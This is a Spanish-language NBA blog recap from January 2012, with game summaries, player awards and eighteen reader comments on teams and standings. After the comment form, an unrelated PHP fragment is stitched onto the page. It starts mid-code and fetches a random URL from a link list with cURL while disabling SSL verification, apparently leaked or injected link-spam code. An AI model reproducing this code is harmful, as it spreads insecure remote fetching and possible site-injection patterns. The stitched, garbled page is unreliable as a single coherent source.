La Crónica: Los Sixers consiguen la quinta victoria consecutiva

10 de January de 2012 por TheDeerHunter

Jornada de transición. Los choques más emocionantes terminaron siendo dos de los que a priori cabría esperar menor igualdad.

Los Knicks se vengaron en el Madison de la reciente derrota que sufrieron de manos de Bobcats (87-91). Eso sí, sufrieron la gota gorda, marcando las diferencias únicamente desde la línea de libres. Otra vez Diaw, en plan hombre orquesta, parecía empeñado en dejar en evidencia a su ex-compañero Amare. Junto a Melo, los dos primeras espadas locales contribuyeron decisivamente al mal porcentaje de tiro que registró el equipo (13 de 43). Por esta vez, sin embargo, pudieron aguantar gracias al sobrio trabajo de Tyson Chandler y también de Iman Shumpert, que relegó a Toney Douglas al banquillo que, por cierto, estuvo particularmente lamentable. Se comentaba el otro día la temprana candidatura de Byron Mullens al MIP. Señalaría en ese apartado el nombre de un compañero suyo, D.J. White, cuyas altas prestaciones no notaron el regreso a la titularidad de Tyrus Thomas.

Los Hawks también sufrieron para doblegar a New Jersey a domicilio, a pesar de la gran actuación de su quinteto (¡con Radmanovic de titular!). Los Nets disfrutaron de un día dulce de sus titulares y desde el perímetro causaron gran daño. Destacaron Morrow, Shawne Williams y MarShon Brooks, pero precisamente Deron no estuvo tan fino y por ahí pudo escaparse la victoria (106-101).

Campanada de NOLA ante Denver, señalando el que puede ser el talón de Aquiles del equipo de Karl (94-81). Con Nenê renqueante y la falta de peso específico en el resto de interiores la tríada Okafor-Kaman-Landry hizo estragos. Por fuera Belinelli y Jack lograron resistir el empuje del perímetro de Nuggets. Pudimos ver a Rudy bastante bien pero al equipo no tanto.

En el resto, ojo a la quinta victoria consecutiva de Sixers ante unos complicados Pacers (86-96). Los Bulls lograron su 13ª victoria consecutiva en enfrentamientos contra Pistons (68-92) y, por último, los Raptors no tuvieron problemas para doblegar a Minnesota en uno de los peores partidos de Love de los últimos tiempos (87-97).

TOP-10

PREMIOS

MVP: Tyson Chandler fue el pilar que dió estabilidad a los Knicks ante lo voluble de sus dos estrellas. También fue el valuarte defensivo que su equipo necesita. 20 puntos, 13 rebotes… pero 3 robos y 3 tapones, además de una asistencia de regalo. Completito.

El rookie: Iman Shumpert, tras pocos días compitiendo, parece haber relegado a Toney Douglas al banquillo y el equipo lo nota. Sin embargo ayer la actuación de MarShon Brooks fue impresionante. 19 puntos, 10 rebotes, 2 asistencias.

La sorpresa: Conociéndole, siempre me alucinan las buenas actuaciones de Vladimir Radmanovic. Ayer salía de titular con los Hawks y lo agradeció. 14 puntos, 6 rebotes, 1 asistencia, 1 robo y extremadamente cómodo en su papel de especialista.

La decepción: Una de las claves de la derrota de Denver anoche fue la actuación conjunta de Al Harrington y André Miller, especialmente teniendo en cuenta el nivel que venían mostrando últimamente.

El mayor esfuerzo en vano: Otra vez Boris Diaw rozando el triple doble. Hablo de memoria pero ¿no es el jugador que a más triples-dobles se ha acercado (o ha firmado) en este comienzo de curso?

Imágenes | AP Photos / Getty Images

Comenta

18 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Me gustaría llamar la atención sobre el trabajo de Monty Williams al frente de los Hornets, son un equipo muy competitivo y les esta faltando Gordon, ya el año pasado lo hizo muy bien y le saca el máximo partido a cada pieza que tiene.

    Y no me habia dado cuenta hasta ayer del plantillón que manejan los Blazers incluso sin Roy ni Oden. Creo que no lo habia hecho por lo que se infravalora a Matthews que es un jugador completísimo en los dos lados de la cancha. Viendo como esta el Oeste es una plantilla para pelear por todo, me gustaría que se la dieran a un entrenador que la saque todo su jugo.

      Citar

  2. Txusma dice:
    #2

    Para los q visteis el partido de los Wolves: Derrick Williams juega de 3 en ausencia de Michael Beasley? Contra los Wizards compartía minutos con Tolliver que supongo, vendría a ser el 4, aunque los 2 se pasan más tiempo en la linea de 3 que dentro de la zona.

      Citar

  3. rumbero dice:
    #3

    Yo lo comentaba el otro día que ojito con Blazers esta temporada. El bloque es buenísimo: Felton-Matthews-Crawford-Wallace-Batum-Camby y un Aldridge a un nivel altísimo. En su campo ya se sabe que son muy duros. A ver si suben un peldaño y pueden hacer cosas más importantes.

    PD: Diaw de triple-doble no ha hecho ninguno, si bien ha estado cerca unas 3-4 veces (concretamente las veces que habéis rajado de él en el hoops xD)

    TOP-10:
    ¿Que le han dado a Landry esta madrugada que sale dos veces en el top? En el 5 es Magic en persona!!
    A Randolph lo hubiera puesto en primera posición sólo por el talegazo en la cara que se lleva

      Citar

  4. Shaggy dice:
    #4

    Que le pasa a Radmanovic?????? si parece que puede servir para jugar al baloncesto y todo!

      Citar

  5. portu dice:
    #5

    Txus, Derrick Williams está jugando de 3 desde la lesión de Beasley, en realidad el quinteto ha cambiado a Ridnour-Ellington-Wes Johnson-Love-Milicic, con Wes Johnson algo mejor jugando de 3 q de 2, al menos el partido q yo vi (no lo vi anoche contra Toronto) y los minutos de Derrick Williams han sido en la posición de 3. Además, el juego interior ya está bastante poblado, Tolliver-Randolph-Pekovic no son malos suplentes…. Jugando de 3 le vi demasiadas veces por detrás de la linea de 3, eso sería lo malo en relación a Derrick Williams, pero creo q es muy inteligente y sabrá sacar provecho de su juego al poste cuando pille un defensor más bajo.

      Citar

  6. Ru dice:
    #6

    Derrick Williams de 3 efectivamente,y Wes Johnson también jugando de 3 desplazado por Ellington,aunque en este partido contra los Raptors no se benefició de una posición a la que por características físicas se ajusta mas.Y como bien habéis comentado la dupla Ridnour-Ricky no pega.

    Radmanovic entrañable,en el NBA Live 2005 me mataba siempre con los Seattle Supersonics.2005 y Supersonics…No tiene nada que admirar a Jordan que éste se retiró dos veces para luego volver.No,no,no,el mérito está en seguir chupando del bote,desaparecer una temporadita y voilá,salir a la palestra de nuevo.Radmanovic Hall Of Fame!!!

    Repasando la estadística de los Pistons -me plantee ver el partido,menos mal que me ahorré la tortura de verlos- el máximo asistente del equipo fue Greg Monroe,el pívot,el mejor con diferencia y un center con muchísimos fundamentos pero absolutamente lamentable en lo que respecta al resto del equipo y cuerpo técnico.No sé qué cáncer hay ahí pero huele a chamusquina.

      Citar

  7. Vader dice:
    #7

    Ru:
    No sé qué cáncer hay ahí pero huele a chamusquina.

    Vaya, ya te pareces a Kevin Garnett… XD

      Citar

  8. Sancho88 dice:
    #8

    Radmanovic creo que no tiró ningún tiro de dos. firmó un 4 de 11. Como en balonmano, él no puede entrar en el área del atacante, solo disparar desde fuera, xd. Nunca estuvo más claro el perfil de tirador de triples. Le tienen ahí para eso, para ser una amanaza exterior, aunque yo con Vlade opinio parecido que con Kapono. Me parecen dos jugadores un poco infrautilizados. Los dos pueden defender, y tienen bastantes buenos movimientos, aunque su principal defecto a mi juicio es que son muy lentos. Pero bueno, tienen bastante clase. Creo que ayer no jugó nada Marvin Williams, y supongo que pusieron a Radmanovic titular por ese motivo. Lleva dos noches promediando 16 puntos, xd. Creo que los Warriors le están echando algo en falta, aunque parezca mentira

      Citar

  9. Sancho88 dice:
    #9

    rumbero:
    Yo lo comentaba el otro día que ojito con Blazers esta temporada. El bloque es buenísimo: Felton-Matthews-Crawford-Wallace-Batum-Camby y un Aldridge a un nivel altísimo. En su campo ya se sabe que son muy duros. A ver si suben un peldaño y pueden hacer cosas más importantes.

    PD: Diaw de triple-doble no ha hecho ninguno, si bien ha estado cerca unas 3-4 veces (concretamente las veces que habéis rajado de él en el hoops xD)

    TOP-10:
    ¿Que le han dado a Landry esta madrugada que sale dos veces en el top? En el 5 es Magic en persona!!
    A Randolph lo hubiera puesto en primera posición sólo por el talegazo en la cara que se lleva

    A Landry casi le mata Nené con un manotazo. Me recordó bastante a cuando Garnett le saltó todos los piños. Pobrecico, se aprovechan de que no es muy alto para postear y sacarle los codos. Le hacen muchísimas faltas de estas, y la de ayer de Nené fue flagrante totalmente, pero los árbitros cada vez permiten más leña en la liga

      Citar

  10. esteban dice:
    #10

    Disculpen, no se si viene al caso, pero estoy enamorado de la temporada de bynum, con el en este nivel, y con mcroberts y murphy en el banco, creo q estan en condiciones de ser campeones nuevamente, necesitan usar esaa excepcion q dejo odom

    Me suena arizan o por q no ben gordon, q vuelve a demostrar su nivel, creo q detroit estaria gustoso de liberar por una exepcion, desp de ver un futuro en penumbras los prpx 3 años con contratos largos y caros de gordon, hamilton y villanueva. En un abrir y cerrar de ojos rescindieron. Hamilton, exepcion por gordon y amistia a villanueva y chan, de pronto estarian super posicionados, no?

      Citar

  11. Tobal dice:
    #11

    Quiero destacar el partido de Toronto Raptors,con un gran Calderón,que le dio una lección a Ricky,de como dirigir a un equipo,tomando buenas decisiones y anotando en momentos claves,se nota mucho su presencia en la cancha,porque cuando estuvo en el banquillo,Minnesota se escapó en el marcador,pero cuando Calderón volvió a jugar de nuevo,los Raptors empezarón a remontar.Me gustó también Bargnani,que estuvo muy bien anotando y reboteando,Amir Johnson hizo un gran trabajo con un doble doble de 19 puntos y 11 rebotes.

      Citar

  12. Esteban dice:
    #12

    esto me ha llamado la atencion:

    Oklahoma City1 8 2 0.800 0.0 7-2 1-1 5-1 3-1 8-2 W 3
    Portland2 6 2 0.750 1.0 4-2 2-0 5-0 1-2 6-2 W 1
    San Antonio3 6 3 0.667 1.5 6-3 2-1 6-0 0-3 6-3 L 1
    L.A. Clippers4 4 2 0.667 2.0 3-1 1-0 3-1 1-1 4-2 W 3
    Utah5 5 3 0.625 2.0 3-3 0-1 4-0 1-3 5-3 W 4
    L.A. Lakers6 6 4 0.600 2.0 5-3 1-1 6-1 0-3 6-4 W 2
    Denver7 6 4 0.600 2.0 5-4 1-1 4-1 2-3 6-4 L 2
    Phoenix8 4 4 0.500 3.0 3-3 1-0 3-2 1-2 4-4 W 2
    Dallas 4 5 0.444 3.5 3-4 1-1 4-2 0-3 4-5 W 1
    Memphis 3 5 0.375 4.0 3-4 1-1 2-1 1-4 3-5 L 2
    Sacramento 3 6 0.333 4.5 2-3 1-0 3-3 0-3 3-6 L 1
    New Orleans 3 6 0.333 4.5 2-5 0-1 1-3 2-3 3-6 W 1
    Minnesota 3 6 0.333 4.5 2-2 0-1 2-4 1-2 3-6 L 1
    Houston 2 6 0.250 5.0 1-5 1-1 2-1 0-5 2-6 L 4
    Golden State 2 6 0.250 5.0 0-5 0-3 2-3 0-3 2-6 L 5

    mirando la tabla, podemos decir que utha se caera y su lugar lo omara dallas y que menphis se recuperara y tomara el lugar de PHOENIX, buenio entonces debo decir

      Citar

  13. Esteban dice:
    #13

    esto me ha llamado la atencion:

    Oklahoma City1 8 2 0.800 0.0 7-2 1-1 5-1 3-1 8-2 W 3
    Portland2 6 2 0.750 1.0 4-2 2-0 5-0 1-2 6-2 W 1
    San Antonio3 6 3 0.667 1.5 6-3 2-1 6-0 0-3 6-3 L 1
    L.A. Clippers4 4 2 0.667 2.0 3-1 1-0 3-1 1-1 4-2 W 3
    Utah5 5 3 0.625 2.0 3-3 0-1 4-0 1-3 5-3 W 4
    L.A. Lakers6 6 4 0.600 2.0 5-3 1-1 6-1 0-3 6-4 W 2
    Denver7 6 4 0.600 2.0 5-4 1-1 4-1 2-3 6-4 L 2
    Phoenix8 4 4 0.500 3.0 3-3 1-0 3-2 1-2 4-4 W 2
    Dallas 4 5 0.444 3.5 3-4 1-1 4-2 0-3 4-5 W 1
    Memphis 3 5 0.375 4.0 3-4 1-1 2-1 1-4 3-5 L 2
    Sacramento 3 6 0.333 4.5 2-3 1-0 3-3 0-3 3-6 L 1
    New Orleans 3 6 0.333 4.5 2-5 0-1 1-3 2-3 3-6 W 1
    Minnesota 3 6 0.333 4.5 2-2 0-1 2-4 1-2 3-6 L 1
    Houston 2 6 0.250 5.0 1-5 1-1 2-1 0-5 2-6 L 4
    Golden State 2 6 0.250 5.0 0-5 0-3 2-3 0-3 2-6 L 5

    mirando la tabla, podemos decir que utha se caera y su lugar lo omara dallas y que menphis se recuperara y tomara el lugar de PHOENIX, buenio entonces debo decir Q MALA ESTA LA CONFERENCIA OESTE!!!

    si los equipos que estaran en el 9no y decimo puesto seran los intracendentes jazz, en plena recontruccion o un solitario nash, hablamos de una decadencia enorme en esta conferencia, quiza houston y warriors se levanten, q seria lo mas logico y ellos terminaran en los 9 y decimos puestos por sobre utha y suns

      Citar

  14. Len Bias dice:
    #14

    Partidazo de Evan Turner! 16 pts, 10 rebs y 8 asistencias. Que siga así mi MIP del año 😉

      Citar

  15. Esteban dice:
    #15

    estoy viendo a la banca de los clippers, madre santa q desastre, MO-FOYE-GOMES-EVANS-COOK

    demasiada vetaja para un equipo q intenta ser protagonista, necesitan dos refuerzos en esa banca ya

      Citar

  16. Esteban dice:
    #16

    ah, lo q le cuesta a griffin frente a jugadores mas alto es impresionante, lo eh visto ya cuando se enfrento con gasol y ahora con aldrigue, sencillamente no puede, mientras no tenga un tiro mas confiable de media distancia no podra contra este tipo de jugador, aunque son los menos obvio

    cada vez me convenzo mas que griffin no mide mas de 2.02 mtrs, me la jugaria a los 2 metros clavados

      Citar

  17. Cocinitas dice:
    #17

    Vaya partidito de Kobe, 48 puntos con 18/31 en tiros y 12/13 en tiros libres casi nada. Por cierto vi también a Ricky y he de decir que a los Bulls les entro hoy todo especialmente a Rose, sino hoy hubieran perdido. Veo a los Wolves dando guerra si se acoplan un poco más los nuevos y Ricky juega más minutos.

      Citar

  18. Sancho88 dice:
    #18

    Esteban:
    ah, lo q le cuesta a griffin frente a jugadores mas alto es impresionante, lo eh visto ya cuando se enfrento con gasol y ahora con aldrigue, sencillamente no puede, mientras no tenga un tiro mas confiable de media distancia no podra contra este tipo de jugador, aunque son los menos obvio

    cada vez me convenzo mas que griffin no mide mas de 2.02 mtrs, me la jugaria a los 2 metros clavados

    Bueno, esto ya lo hablamos en pretemporada. Clippers tiene poco banco, y creo que deberían haberse movido un poco más con el tema de ofrecer algún base para sacar o un escolta o un pívot. A Jordan yo le veo como suplente, pero bueno, encontrar un cinco de garantías ahí es complicado, y supongo que querrán tener paciencia con él. Cualidades tiene de sobra, aunque como yo digo está un poco verde aún. Un MO-Bledsoe por algo decente que les permita rotar el juego exterior estaría bien

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>